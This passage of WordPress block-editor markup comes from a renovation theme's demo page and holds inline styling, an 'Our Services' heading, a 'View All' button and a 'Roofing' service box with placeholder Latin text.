skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"15484d76-9179-4e01-8b89-989f442b6547\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-15484d76-9179-4e01-8b89-989f442b6547 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-15484d76-9179-4e01-8b89-989f442b6547\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Services</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">We Provide the Best Renovation</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"rightPadding\":15,\"blockId\":\"9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc\"} -->\n<style type=\"text/css\"> .block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 15px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9498a3a5-72a6-41a4-a3eb-6ba0db0db9cc\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/\",\"counterId\":\"240ef76e-ed43-4e3f-bfc0-9e8f9301de7c\",\"vPadding\":13,\"hPadding\":27,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 13px; padding-bottom: 13px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 27px; padding-right: 27px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-240ef76e-ed43-4e3f-bfc0-9e8f9301de7c skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/\">View All</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"cb16518f-652e-4bd4-b130-282e93e1e92c\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-cb16518f-652e-4bd4-b130-282e93e1e92c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-cb16518f-652e-4bd4-b130-282e93e1e92c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cb16518f-652e-4bd4-b130-282e93e1e92c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cb16518f-652e-4bd4-b130-282e93e1e92c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-cb16518f-652e-4bd4-b130-282e93e1e92c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-cb16518f-652e-4bd4-b130-282e93e1e92c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"2844f034-6cf3-4a8e-9cb1-730e117d36c6\"} -->\n<style type=\"text/css\"> .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-2844f034-6cf3-4a8e-9cb1-730e117d36c6 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"56514e3e-8c35-48af-934c-0e8c50699407\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-56514e3e-8c35-48af-934c-0e8c50699407 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-56514e3e-8c35-48af-934c-0e8c50699407 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-56514e3e-8c35-48af-934c-0e8c50699407 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-56514e3e-8c35-48af-934c-0e8c50699407 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-56514e3e-8c35-48af-934c-0e8c50699407 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-56514e3e-8c35-48af-934c-0e8c50699407\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"5efab61b-cad5-4031-a1a7-6492798b1d6b\"} -->\n<style type=\"text/css\"> .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5efab61b-cad5-4031-a1a7-6492798b1d6b skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"fa386f1d-9b22-436e-92d5-84b6fc145ee9\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-fa386f1d-9b22-436e-92d5-84b6fc145ee9 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-fa386f1d-9b22-436e-92d5-84b6fc145ee9 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-fa386f1d-9b22-436e-92d5-84b6fc145ee9 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 